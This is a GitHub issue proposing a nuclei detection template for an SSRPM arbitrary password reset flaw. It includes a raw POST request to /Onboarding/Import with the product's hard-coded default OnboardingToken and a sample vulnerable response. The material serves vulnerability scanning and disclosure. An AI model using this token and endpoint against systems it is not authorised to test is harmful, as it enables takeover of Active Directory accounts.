projectdiscovery / nuclei-templates

Community curated list of templates for the nuclei engine to find security vulnerabilities.
https://github.com/projectdiscovery/nuclei
MIT License
8.99k stars, 2.57k forks

SSRPM - ARBITRARY PASSWORD RESET ON DEFAULT CLIENT WEB INTERFACE INSTALLATION #10214

Closed vince-isec closed 1 month ago

vince-isec commented 2 months ago

Template Information:

SSRPM (Self-Service Reset Password Manager) is Tools4ever’s premier password self-service solution. It allows organizations of all sizes to unburden their helpdesk and empower their end users regarding forgotten passwords and account management. This solution is usually synchronized with an on-premise Active Directory and its Client Web Interface component is usually exposed to the Internet. The default installation of the Client Web Interface, which is provided alongside the COM SSRPM service, defines a hard-coded secret token for the Import endpoint. This endpoint allows registering new accounts or overwriting existing onboarding data for an arbitrary account, which ultimately allows changing the password of an arbitrary account.

Issuing a POST request to the endpoint /Onboarding/Import using the default OnboardingToken can determine whether the targeted installation is affected by this vulnerability. If it is, it will return an HTTP response with the ErrorCode value -55.

Nuclei Template:

generated using ProjectDiscoveryAI Tool


```yaml
id: tools4ever-ssrpm-arbitrary-password-reset

info:
  name: Tools4Ever SSRPM Arbitrary Password Reset
  author: ProjectDiscoveryAI
  severity: high
  description: |
    Tools4Ever SSRPM is vulnerable to arbitrary password reset due to improper validation of the onboarding token, allowing attackers to take control of certain accounts.
  reference:
    - https://www.synacktiv.com/advisories/ssrpm-arbitrary-password-reset-on-default-client-web-interface-installation

http:
  - raw:
      # Probe the Import endpoint with the default (hard-coded) OnboardingToken.
      # No Content-Length header: nuclei computes it from the body. The value
      # originally given here (64) did not match the 73-byte body below.
      - |
        POST /Onboarding/Import HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        OnboardingToken=7e30bebc-d17c-4833-98b6-d4c09e076b24&Action=testIntrinsec

    # Both matchers must hit: HTTP 200 and the JSON error body with ErrorCode -55,
    # which the advisory identifies as the response of an affected installation.
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: body
        words:
          - '"ErrorCode":-55'
          - '"Success":false'
```

Example response from a vulnerable target:

```http
HTTP/1.1 200 OK
Date: Tue, 25 Jun 2024 12:33:52 GMT
Server: XXX
Set-Cookie: ASP.NET_SessionId=2iaeferfvwc0j3f30bbjvlmt; path=/; HttpOnly; SameSite=Lax
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self';
Strict-Transport-Security: max-age=31536000
Content-Length: 133

{"Success":false,"ErrorCode":-55,"ErrorMessage":"An error occurred. Please contact your system administrator if the issue persists."}
```

DhiyaneshGeek commented 1 month ago

Hi @vince-isec

Thanks for sharing this template with the community, I have raised a PR for the same: #10381

You can grab some cool PD stickers over here http://nux.gg/stickers 😄